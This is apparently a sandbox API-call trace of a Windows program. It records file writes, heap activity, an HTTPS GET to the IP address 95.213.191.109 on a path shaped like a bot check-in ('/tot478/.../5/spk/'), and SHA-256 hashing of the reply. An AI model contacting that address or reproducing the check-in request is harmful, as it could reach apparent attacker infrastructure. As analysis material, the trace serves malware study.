	[0206.304] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.304] WriteFile (in: hFile=0x534, lpBuffer=0x26d2f1c*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2f1c*, lpNumberOfBytesWritten=0x129420*=0x45, lpOverlapped=0x0) returned 1
	[0206.304] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.304] WriteFile (in: hFile=0x534, lpBuffer=0x26d2f63*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2f63*, lpNumberOfBytesWritten=0x129420*=0x3a, lpOverlapped=0x0) returned 1
	[0206.304] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.304] WriteFile (in: hFile=0x534, lpBuffer=0x26d2f9f*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2f9f*, lpNumberOfBytesWritten=0x129420*=0x32, lpOverlapped=0x0) returned 1
	[0206.304] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.304] WriteFile (in: hFile=0x534, lpBuffer=0x26d2fd3*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2fd3*, lpNumberOfBytesWritten=0x129420*=0x2b, lpOverlapped=0x0) returned 1
	[0206.304] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.304] WriteFile (in: hFile=0x534, lpBuffer=0x26d3000*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d3000*, lpNumberOfBytesWritten=0x129420*=0x49, lpOverlapped=0x0) returned 1
	[0206.304] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.304] WriteFile (in: hFile=0x534, lpBuffer=0x26d304b*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d304b*, lpNumberOfBytesWritten=0x129420*=0x41, lpOverlapped=0x0) returned 1
	[0206.304] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.304] WriteFile (in: hFile=0x534, lpBuffer=0x26d308e*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d308e*, lpNumberOfBytesWritten=0x129420*=0x1d, lpOverlapped=0x0) returned 1
	[0206.305] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.305] WriteFile (in: hFile=0x534, lpBuffer=0x26d30ad*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d30ad*, lpNumberOfBytesWritten=0x129420*=0x53, lpOverlapped=0x0) returned 1
	[0206.305] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.305] WriteFile (in: hFile=0x534, lpBuffer=0x26d3102*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d3102*, lpNumberOfBytesWritten=0x129420*=0x1b, lpOverlapped=0x0) returned 1
	[0206.305] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.305] WriteFile (in: hFile=0x534, lpBuffer=0x26d311f*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d311f*, lpNumberOfBytesWritten=0x129420*=0x50, lpOverlapped=0x0) returned 1
	[0206.305] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.305] WriteFile (in: hFile=0x534, lpBuffer=0x26d3171*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d3171*, lpNumberOfBytesWritten=0x129420*=0x47, lpOverlapped=0x0) returned 1
	[0206.305] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.305] WriteFile (in: hFile=0x534, lpBuffer=0x26d31ba*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d31ba*, lpNumberOfBytesWritten=0x129420*=0x19, lpOverlapped=0x0) returned 1
	[0206.305] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.305] WriteFile (in: hFile=0x534, lpBuffer=0x26d31d5*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d31d5*, lpNumberOfBytesWritten=0x129420*=0x1a, lpOverlapped=0x0) returned 1
	[0206.305] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.305] WriteFile (in: hFile=0x534, lpBuffer=0x26d31f1*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d31f1*, lpNumberOfBytesWritten=0x129420*=0x40, lpOverlapped=0x0) returned 1
	[0206.305] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.306] WriteFile (in: hFile=0x534, lpBuffer=0x26d3233*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d3233*, lpNumberOfBytesWritten=0x129420*=0x1d, lpOverlapped=0x0) returned 1
	[0206.306] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.306] WriteFile (in: hFile=0x534, lpBuffer=0x26d3252*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d3252*, lpNumberOfBytesWritten=0x129420*=0x20, lpOverlapped=0x0) returned 1
	[0206.306] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.306] WriteFile (in: hFile=0x534, lpBuffer=0x26d3274*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d3274*, lpNumberOfBytesWritten=0x129420*=0x26, lpOverlapped=0x0) returned 1
	[0206.306] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.306] WriteFile (in: hFile=0x534, lpBuffer=0x26d329c*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d329c*, lpNumberOfBytesWritten=0x129420*=0x2e, lpOverlapped=0x0) returned 1
	[0206.306] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.306] WriteFile (in: hFile=0x534, lpBuffer=0x26d32cc*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d32cc*, lpNumberOfBytesWritten=0x129420*=0x44, lpOverlapped=0x0) returned 1
	[0206.306] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.306] WriteFile (in: hFile=0x534, lpBuffer=0x26d3312*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d3312*, lpNumberOfBytesWritten=0x129420*=0x18, lpOverlapped=0x0) returned 1
	[0206.306] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.306] WriteFile (in: hFile=0x534, lpBuffer=0x26d332c*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d332c*, lpNumberOfBytesWritten=0x129420*=0x1b, lpOverlapped=0x0) returned 1
	[0206.306] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.306] WriteFile (in: hFile=0x534, lpBuffer=0x26d3349*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d3349*, lpNumberOfBytesWritten=0x129420*=0x4c, lpOverlapped=0x0) returned 1
	[0206.306] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.307] CloseHandle (hObject=0x534) returned 1
	[0206.308] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cec08) returned 1
	[0206.308] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff8d0
	[0206.308] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff768) returned 1
	[0206.308] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2488f8) returned 1
	[0206.308] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24c9a8) returned 1
	[0206.308] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248910) returned 1
	[0206.308] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x212f50) returned 1
	[0206.308] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0206.309] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24cfc8) returned 1
	[0206.309] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d010) returned 1
	[0206.309] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23f050) returned 1
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294c8 | out: lpSystemTimeAsFileTime=0x1294c8*(dwLowDateTime=0x643118c0, dwHighDateTime=0x1d50a6a)) 
	[0206.310] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d028) returned 1
	[0206.310] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x24d028
	[0206.310] WinHttpCloseHandle (hInternet=0x227d8a0) returned 1
	[0206.310] WinHttpConnect (hSession=0x1f2598, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c4dc0
	[0206.311] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb8b0
	[0206.311] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x64337a20, dwHighDateTime=0x1d50a6a)) 
	[0206.311] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1e4538) returned 1
	[0206.311] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x1e4538
	[0206.311] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0206.312] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0206.312] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/spk/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0206.312] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128af0, dwBufferLength=0x4) returned 1
	[0206.312] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0207.789] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0207.789] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128ae0, lpdwBufferLength=0x128adc, lpdwIndex=0x0 | out: lpBuffer=0x128ae0*, lpdwBufferLength=0x128adc*=0x4, lpdwIndex=0x0) returned 1
	[0207.789] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128ae4 | out: lpdwNumberOfBytesAvailable=0x128ae4*=0xe0) returned 1
	[0207.790] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xe0) returned 0x22c56d0
	[0207.790] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x22c56d0, dwNumberOfBytesToRead=0xe0, lpdwNumberOfBytesRead=0x128adc | out: lpBuffer=0x22c56d0*, lpdwNumberOfBytesRead=0x128adc*=0xe0) returned 1
	[0207.790] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128ae4 | out: lpdwNumberOfBytesAvailable=0x128ae4*=0x0) returned 1
	[0207.790] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffd50
	[0207.790] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x275fc38
	[0207.790] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.791] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.791] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0207.791] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.791] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc580
	[0207.791] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26cc580, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc580, pdwDataLen=0x129364) returned 1
	[0207.791] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.791] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.791] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.791] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.791] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0207.791] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.791] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc738
	[0207.791] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cc738, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc738, pdwDataLen=0x129364) returned 1
	[0207.791] CryptDestroyHash (hHash=0x22b6c00) returned 1
